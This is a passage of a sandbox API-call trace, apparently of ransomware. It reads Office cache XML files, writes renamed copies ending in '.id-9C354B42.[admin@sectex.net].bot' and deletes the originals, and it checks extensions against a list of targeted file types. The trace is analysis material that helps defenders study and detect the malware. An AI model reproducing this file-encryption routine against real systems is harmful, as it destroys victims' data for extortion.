	[0033.651] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.651] SetEndOfFile (hFile=0x180) returned 1
	[0033.651] CloseHandle (hObject=0x180) returned 1
	[0033.652] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.652] SetEndOfFile (hFile=0x18c) returned 1
	[0033.653] CloseHandle (hObject=0x18c) returned 1
	[0033.653] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.653] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString=".doc") returned 4
	[0033.654] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString=".docx") returned 5
	[0033.654] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.654] lstrlenW (lpString=".pdf") returned 4
	[0033.654] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString=".xls") returned 4
	[0033.654] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString=".xlsx") returned 5
	[0033.654] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.654] lstrlenW (lpString=".ppt") returned 4
	[0033.654] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString=".zip") returned 4
	[0033.654] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.654] lstrlenW (lpString=".rar") returned 4
	[0033.654] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString=".bz2") returned 4
	[0033.654] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString=".7z") returned 3
	[0033.654] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString=".dbf") returned 4
	[0033.654] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString=".1cd") returned 4
	[0033.654] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString=".jpg") returned 4
	[0033.654] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.655] lstrlenW (lpString=".doc") returned 4
	[0033.655] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString=".docx") returned 5
	[0033.655] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.655] lstrlenW (lpString=".pdf") returned 4
	[0033.655] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString=".xls") returned 4
	[0033.655] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString=".xlsx") returned 5
	[0033.655] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.655] lstrlenW (lpString=".ppt") returned 4
	[0033.655] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.655] lstrlenW (lpString=".zip") returned 4
	[0033.655] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.655] lstrlenW (lpString=".rar") returned 4
	[0033.655] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString=".bz2") returned 4
	[0033.655] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString=".7z") returned 3
	[0033.655] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.655] lstrlenW (lpString=".dbf") returned 4
	[0033.655] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.655] lstrlenW (lpString=".1cd") returned 4
	[0033.655] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.655] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81
	[0033.655] lstrlenW (lpString=".jpg") returned 4
	[0033.655] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.655] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.712] lstrlenW (lpString="Proofing.xml") returned 12
	[0033.712] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.714] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=811) returned 1
	[0033.714] CloseHandle (hObject=0x18c) returned 1
	[0033.714] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020
	[0033.714] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.714] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.714] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.715] GetLastError () returned 0x0
	[0033.715] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x32b, lpOverlapped=0x0) returned 1
	[0033.716] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x330, lpOverlapped=0x0) returned 1
	[0033.717] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.717] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0033.717] SetEndOfFile (hFile=0x180) returned 1
	[0033.717] CloseHandle (hObject=0x180) returned 1
	[0033.718] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.718] SetEndOfFile (hFile=0x18c) returned 1
	[0033.719] CloseHandle (hObject=0x18c) returned 1
	[0033.719] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.719] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1
	[0033.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.720] lstrlenW (lpString=".doc") returned 4
	[0033.720] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString=".docx") returned 5
	[0033.720] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
	[0033.720] lstrlenW (lpString=".pdf") returned 4
	[0033.720] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString=".xls") returned 4
	[0033.720] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString=".xlsx") returned 5
	[0033.720] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0033.720] lstrlenW (lpString=".ppt") returned 4
	[0033.720] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.720] lstrlenW (lpString=".zip") returned 4
	[0033.720] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.720] lstrlenW (lpString=".rar") returned 4
	[0033.720] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString=".bz2") returned 4
	[0033.720] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString=".7z") returned 3
	[0033.720] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.720] lstrlenW (lpString=".dbf") returned 4
	[0033.720] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.720] lstrlenW (lpString=".1cd") returned 4
	[0033.720] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".jpg") returned 4
	[0033.721] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".doc") returned 4
	[0033.721] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString=".docx") returned 5
	[0033.721] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
	[0033.721] lstrlenW (lpString=".pdf") returned 4
	[0033.721] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString=".xls") returned 4
	[0033.721] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString=".xlsx") returned 5
	[0033.721] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0033.721] lstrlenW (lpString=".ppt") returned 4
	[0033.721] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".zip") returned 4
	[0033.721] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.721] lstrlenW (lpString=".rar") returned 4
	[0033.721] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString=".bz2") returned 4
	[0033.721] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString=".7z") returned 3
	[0033.721] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".dbf") returned 4
	[0033.721] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".1cd") returned 4
	[0033.721] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.721] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75
	[0033.721] lstrlenW (lpString=".jpg") returned 4
	[0033.722] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.722] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.722] lstrlenW (lpString="Setup.xml") returned 9
	[0033.722] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.722] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5884) returned 1
	[0033.722] CloseHandle (hObject=0x18c) returned 1
	[0033.722] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.722] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.722] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.722] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.722] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.722] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.723] GetLastError () returned 0x0
	[0033.723] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x16fc, lpOverlapped=0x0) returned 1
	[0033.724] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1700, lpOverlapped=0x0) returned 1
	[0033.725] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.725] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.725] SetEndOfFile (hFile=0x180) returned 1
	[0033.725] CloseHandle (hObject=0x180) returned 1
	[0033.726] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.726] SetEndOfFile (hFile=0x18c) returned 1
	[0033.727] CloseHandle (hObject=0x18c) returned 1
	[0033.727] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.727] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.727] lstrlenW (lpString=".doc") returned 4
	[0033.727] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.727] lstrlenW (lpString=".docx") returned 5
	[0033.727] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.727] lstrlenW (lpString=".pdf") returned 4
	[0033.727] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".xls") returned 4
	[0033.728] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".xlsx") returned 5
	[0033.728] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.728] lstrlenW (lpString=".ppt") returned 4
	[0033.728] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString=".zip") returned 4
	[0033.728] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.728] lstrlenW (lpString=".rar") returned 4
	[0033.728] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".bz2") returned 4
	[0033.728] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".7z") returned 3
	[0033.728] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString=".dbf") returned 4
	[0033.728] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString=".1cd") returned 4
	[0033.728] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString=".jpg") returned 4
	[0033.728] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.728] lstrlenW (lpString=".doc") returned 4
	[0033.728] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".docx") returned 5
	[0033.728] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.728] lstrlenW (lpString=".pdf") returned 4
	[0033.728] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.728] lstrlenW (lpString=".xls") returned 4
	[0033.728] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString=".xlsx") returned 5
	[0033.729] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.729] lstrlenW (lpString=".ppt") returned 4
	[0033.729] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.729] lstrlenW (lpString=".zip") returned 4
	[0033.729] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.729] lstrlenW (lpString=".rar") returned 4
	[0033.729] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString=".bz2") returned 4
	[0033.729] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString=".7z") returned 3
	[0033.729] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.729] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.729] lstrlenW (lpString=".dbf") returned 4
	[0033.729] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.729] lstrlenW (lpString=".1cd") returned 4
	[0033.729] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.729] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.729] lstrlenW (lpString=".jpg") returned 4
	[0033.729] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.729] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.729] lstrlenW (lpString="Office32MUI.xml") returned 15
	[0033.729] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.730] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1383) returned 1
	[0033.730] CloseHandle (hObject=0x18c) returned 1
	[0033.730] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020
	[0033.730] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.730] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.730] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.731] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.731] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.731] GetLastError () returned 0x0
